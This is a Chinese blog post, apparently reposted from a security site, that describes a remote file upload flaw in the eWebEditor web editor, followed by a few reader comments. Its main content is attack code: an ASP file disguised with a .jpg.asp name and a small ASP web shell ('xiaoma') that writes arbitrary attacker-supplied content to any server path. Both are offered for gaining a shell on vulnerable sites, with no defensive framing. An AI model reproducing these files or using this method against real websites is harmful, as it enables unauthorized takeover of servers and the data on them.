
ewebditor远程文件上传漏洞
每个版本的更新后让我们拿权限变得更难了,最近ewebditor蛋疼的又暴漏洞了 – 远程上传漏洞。
漏洞描述:
远程上传时执行代码,导致get shell
1.把x.jpg.asp xiaoma.ASa放在同一目录下 小马代码:
——————x.jpg.asp ————————————————————————————————————
1 2 3 4 5 6 7 8 |
<ol> <li><%</li> <li>Set fs = CreateObject("Scripting.FileSystemObject")</li> <li>Set MyTextStream=fs.OpenTextFile(server.MapPath("\xiaoma.asp"),1,false,0)</li> <li>Thetext=MyTextStream.ReadAll</li> <li>response.write thetext</li> <li>%></li> </ol> |
——————————————————————x.jpg.asp————————————————————
————————xiaoma.ASa——————————————————————————
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
<ol> <li><%on error resume next%></li> <li><%ofso="scripting.filesystemobject"%></li> <li><%set fso=server.createobject(ofso)%></li> <li><%path=request("path")%></li> <li><%if path<>"" then%></li> <li><%data=request("dama")%></li> <li><%set dama=fso.createtextfile(path,true)%></li> <li><%dama.write data%></li> <li><%if err=0 then%></li> <li><%="success"%></li> <li><%else%></li> <li><%="false"%></li> <li><%end if%></li> <li><%err.clear%></li> <li><%end if%></li> <li><%dama.close%></li> <li><%set dama=nothing%></li> <li><%set fos=nothing%></li> <li><%="<form action='' method=post>"%></li> <li><%="<input type=text name=path>"%></li> <li><%="<br>"%></li> <li><%=server.mappath(request.servervariables("script_name"))%></li> <li><%="<br>"%></li> <li><%=""%></li> <li><%="<textarea name=dama cols=50 rows=10 width=30></textarea>"%></li> <li><%="<br>"%></li> <li><%="<input type=submit value=save>"%></li> <li><%="</form>"%></li> </ol> |
————————xiaoma.ASa——————————————————————————
2.远程上传x.jpg.asp
会自动执行脚本,你们懂得。
本文摘自网络由网络安全(www.91ri.org)收集整理.
遇到这样一个站了,这个方法切讲的及不详细。郁闷死我了!
您的那个网站存在网络上传吗 个人认为已经很详细了.
利用失败。
能说详细点吗